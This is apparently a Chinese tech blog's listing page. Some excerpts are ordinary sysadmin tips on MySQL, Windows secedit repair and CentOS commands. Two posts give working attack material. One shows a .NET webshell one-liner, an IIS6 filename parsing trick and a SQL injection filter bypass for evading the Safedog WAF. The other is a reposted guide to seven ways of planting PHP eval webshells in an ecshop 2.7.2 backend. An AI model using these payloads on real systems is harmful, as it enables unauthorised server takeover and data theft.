预览模式: 普通 | 列表
该日志是私密日志,只有博主或发布者可以查看!
分类:其它文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1056

Win7与Ubuntu双系统时卸载Ubuntu的方法

1. 下载MBRFix工具,放在c盘,利用命令提示符,进入软件所在目录,cd c:\mbrfix    (cd后面一个空格)

免费下载地址在 http://linux.linuxidc.com/

用户名与密码都是www.linuxidc.com

查看更多...

分类:其它文章 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 1634

mysql宕掉的问题解决

mysql宕掉的问题解决

可能原因是数据过多导致。

mysql 命令可以识别 但是进去后不能执行相关的mysql命令,

查看更多...

分类:服务器 | 固定链接 | 评论: 142 | 引用: 0 | 查看次数: 3294

mysql ibdata1文件的缩小操作

mysql ibdata1文件的缩小操作

最近发现MYSQL 的碎片狂大,在一张有上千万的表空间里面碎片占用十分厉害,但是单独的用alert table table_name engine=innodb 基本无法执行,因为表实在是过大,ALERT方法适合一些中小型的数据库。所以最后的办法就是导入导出的步骤

mysql ibdata1存放数据,索引等,是MYSQL的最主要的数据。

查看更多...

分类:服务器 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1571

突破安全狗的一些记录

1、绕过IIS安全狗的一句话。
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["t00ls"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
连接端用cncert的aspx一句话客户端。
 
2、IIS6.0解析漏洞遇到安全狗。
文件名为http://www.xxxx.com/1.asp;1.jpg。
这样的会被IIS安全狗果断屏蔽。
改成如下名称,IIS6一样会解析:
http://www.xxxx.com/;1.asp;1.jpg
 
3、安全狗的注入绕过。
常用的如seo.asp?id=1 and 1=1 是会被安全狗屏蔽的。
但如果:
seo.asp?seo.com=%00.&id=69%20 and 1=1就可以成功绕过了。 

 

分类:网络安全 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1547

 在尝试从本地安全性数据库(%windir%\security\database\secedit.sdb)中检索这些设置时返回的错误为:参数不正确。 

所有本地安全性设置都将被显示,但是不会指出一个给定的安全性设置是否由组策略定义。 
所有由此用户界面改动的本地安全性设置都可能随后被域级的策略覆盖。 

按照网上的办法如下: 
解决方案: 

1.
切换到命令提示符状态。 
2.
执行“esentutl /k %windir%\Security\Database\Secedit.sdb”“esentutl /g %windir%\Security\Database\Secedit.sdb”secedit.sdb进行检查。 
3.
手工备份要修复的数据库文件。 
4.
执行“esentutl /p %windir%\Security\Database\Secedit.sdb”进行修复,系统会弹出Warning提示框: 
"You should only run Repair on damaged or corrupted databases.Repair will not apply information in the transaction log files to the database,and may cause information to be lost.Do you wish to proceed?" 
单击OK,开始修复。 

执行后显示内容:
Microsoft(R) Windows(R) Database Utilities
Version 5.2
Copyright (C) Microsoft Corporation. All Rights Reserved.

Initiating REPAIR mode...
        Database: C:\WINDOWS\Security\Database\Secedit.sdb
  Temp. Database: TEMPREPAIR4884.EDB

Checking database integrity.

The database is not up-to-date. This operation may find that
this database is corrupt because data from the log files has
yet to be placed in the database.

To ensure the database is up-to-date please use the 'Recovery' operation.


                     Scanning Status (% complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................


Integrity check successful.

Note:
  It is recommended that you immediately perform a full backup
  of this database. If you restore a backup made before the
  repair, the database will be rolled back to the state
  it was in at the time of that backup.

Operation completed successfully in 13.328 seconds.

分类:服务器 | 固定链接 | 评论: 38 | 引用: 0 | 查看次数: 1832
使用CentOS常用命令查看cpu

more /proc/cpuinfo | grep "model name"  
grep "model name" /proc/cpuinfo  
grep "model name" /proc/cpuinfo | cut -f2 -d:

查看更多...

分类:CentOS | 固定链接 | 评论: 524 | 引用: 0 | 查看次数: 8286

ecshop后台拿shell 个人总结七种方法

 最近想弄个ecshop做销售。装好ecshop V2.7.2版本之后,测试后台拿shell。

本人整理给自己看的,大家飘过就好。BY:黑猫

ecshop后台拿shell 个人总结七种方法

一、

系统==>数据库管理==>sql查询(可爆出物理路径):

==============创建表失败,导不出shell======================

show databases;
use 数据库名;
create a(cmd text not null);
insert into a(cmd) values(‘<?php eval($_POST[cmd]);?>’);
select cmd from a into outfile ‘导出路径’;
drop table if exists a;

==================创建表失败,导不出shell===================

二、

前台留个言,内容是我们的一句话木马:<?php eval($_POST[cmd]);?>

接着在后台系统==>数据库管理==>数据备份==>选择自定义备份,选择ecs_feedback这张表(存放留言的表)

备份文件名:x.php;.sql (x.php.sql形式出错,菜刀链接不成功)

然后菜刀链接成功

http://www.webshell.cc/data/sqldata/x.php;.sql

三、

1、添加会员,会员名称插入插入一句话 :<?php eval($_POST[cmd]);?> ,其他随便填写。
2、系统==>数据库管理==>数据备份—自定义备份—选“XXX_users”
(其中XXX因各站而异,是数据前缀)
3、备份文件名为mm.php;.sql
4、一句话客户端连接mm.php;.sql,地址一般为 http://www.webshell.cc/data/sqldata/mm.php;.sql

四、

模板管理==>库项目管理==>选择myship.lbi 配送方式。

在文件内容最后面加入一句话代码:<?php eval($_POST[cmd]);?>

菜刀链接http://www.webshell.cc/myship.php 成功。

说明:有些服务器过滤了eval 导致失败。

五、

http://www.webshell.cc/includes/fckeditor/editor/filemanager/connectors/test.html

代码省略
对Media 没有任何限制. 直接 Type=Media 上传 你的 解密webshell
访问路径为

http://www.webshell.cc/images/upload/Media/xxx.php

六、

上传txt 并且没有过滤任何函数.
于是运用到了php的文件操作…
<script language=”php”>$file = file_get_contents(“C:/Inetpub/wwwroot/ecshop/data/Article/1286344719152816497.txt”);
if($file){
$file = “C:/Inetpub/wwwroot/ecshop/data/Article/1286344719152816497.txt”;
$newfile = ‘C:/Inetpub/wwwroot/ecshop/data/distant.php;a.txt’;
copy($file,$newfile);
}</script>

将以上代码插入库项目管理中的myship.ini
打开http://www.webshell.cc/myship.php
即在http://www.webshell.cc/data/目录下生成distant.php;a.txt
菜刀连接之…搞定..

七、

进入后台-系统设置-Flash播放器管理- 直接上传x.php

ecshop V2.7.2 版本已经没有这个选项 ,所以这个已经失效。

转载来的文章,还不错,原作者博客地址
ecshop后台拿shell 个人总结七种方法:http://www.webshell.cc/1625.html
 
 
分类:网络安全 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1778
最近ipad经常会自动下载、安装一些莫名其妙的乱七八糟的软件,ipad是6.1系统,已越狱,印象中最近没有装过什么deb格式的程序。大家都知道,装ipa格式的软件是不会中毒不会出现这种问题的。

于是SSH连接到ipad,执行ps -e -f查看了进程。

进程较多,就不全部列出了。

查看更多...

分类:其它文章 | 固定链接 | 评论: 392 | 引用: 0 | 查看次数: 8335